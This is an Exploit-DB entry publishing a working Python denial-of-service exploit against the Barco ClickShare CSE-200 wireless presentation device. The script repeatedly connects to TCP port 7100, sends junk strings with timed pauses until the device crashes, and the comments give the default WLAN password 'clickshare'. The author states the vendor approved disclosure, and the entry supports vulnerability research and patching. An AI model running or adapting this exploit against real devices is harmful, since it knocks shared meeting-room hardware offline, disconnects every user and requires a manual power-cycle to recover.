Barco ClickShare CSE-200 - Remote Denial of Service

EDB-ID:

44456

CVE:

N/A

EDB Verified:

Author:

Florian Hauser

Type:

dos

Exploit:   /  

Platform:

Hardware

Date:

2018-04-16

Vulnerable App: 
#!/usr/bin/python

# Exploit Title: Barco ClickShare CSE-200 - Remote Denial of Service
# Date: 11-04-2018
# Hardware Link: https://www.barco.com/de/product/clickshare-cse-200
# Exploit Author: Florian Hauser
# Contact: florian DOT g DOT hauser AT gmail DOT com
# CVE: requested by Barco
# Category: Hardware

#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Florian Hauser is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Florian Hauser's 
#  responsibility.
#   
#  Use them at your own risk!
################
# Vulnerability description (you have to be connected to the ClickShare WLAN for that, standard password is 'clickshare'):
# Sending arbitrary unexpected string to TCP port 7100 with respect to -> a certain time sequence <-
# not only disconnects all clients but also results in a crash of this hardware device
# Recover: Switch energy supply off for several minutes and reboot the system. Patches will be delivered in July 2018.
# I got permission from Barco to disclose this vulnerability.
# This affects potentially all other ClickShare products, Barco confirms

import socket
import sys
from time import sleep

if len(sys.argv) != 2:
	print "Usage: exploit.py <ip>"
	sys.exit(0)


# Sending random string until crash occurs. Max. of 50 seems definitely sufficient for that.
# 6-7 requests do the job usually
for x in range(1,50):
	#Create a new socket each time because otherwise the service drops the socket
	#Same request cannot be sent several times in sequence
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	
	#Connect to vulnerable TCP port 7100
	connect=s.connect((str(sys.argv[1]), 7100))
	s.send('some evil string \r\n\n')
	print "Buffer " + str(x) + " sent...\n"
	
	result=s.recv(1024)
	print result
	s.close()
	
	#Sleep for a few seconds because otherwise the service denies a socket creation but does not crash
	sleep(7)
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services